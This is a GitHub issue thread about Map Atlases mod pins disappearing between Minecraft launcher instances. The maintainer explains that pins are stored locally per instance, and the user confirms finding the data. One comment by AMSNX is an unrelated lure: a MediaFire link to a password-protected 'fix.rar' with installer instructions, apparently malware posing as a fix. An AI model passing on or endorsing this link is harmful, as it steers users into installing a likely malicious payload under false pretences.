### ISSUE TITLE
Markers disappear when using different startup/launcher/instance?

### ISSUE THREAD

**Issue by OceanusProcellarum** [MehVahdJukaar/mapatlases-neoforge#150]
I switch between 2 launchers because one is more convenient than the other in certain situations:
- The standard Minecraft launcher with Forge installed (where one would manually install mods in the %appdata% location).
- The Minecraft launcher constructed using the Curseforge software (which automatically installs mods in a separate location within my documents folder).

Both using:
- map_atlases_1.20-6.0.9
- Forge 47.3.0

When I join the same server using the same mods on the same Minecraft account but using the Curseforge-created launcher, the same atlas will have all its markers missing. The markers will still be present when I switch back to the "default" Minecraft launcher. 

I've also tried making a new Forge installation in the original Minecraft launcher to see whether that would make the markers disappear, but it didn't. I know the default MC launcher doesn't really separate 'instances' like Curseforge does, so this probably doesn't reveal much.

Are the atlas markers stored within each launcher instance? How would I go about copying the data from one to another?

Here's what it looks like. Above is using the standard Minecraft/Forge launcher instance, and then below is the one from Curseforge.
<img width="586" alt="Standard Forge Launcher Instance" src="https://github.com/user-attachments/assets/56b9707d-a820-49b5-a1c8-94a6ff7bc8ef">
<img width="419" alt="Curseforge Forge Launcher Instance" src="https://github.com/user-attachments/assets/01e2f624-4898-454c-8e4d-37a243bb212f">

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MehVahdJukaar** [comment]
First of all those aren't markers. They are pins. Their whole point is to be client side icons that only you can see so obviously they are saved locally in your local inatance

**Comment by OceanusProcellarum** [comment]
Apologies for the mix-up. I also found the nbt data in the instance folder.
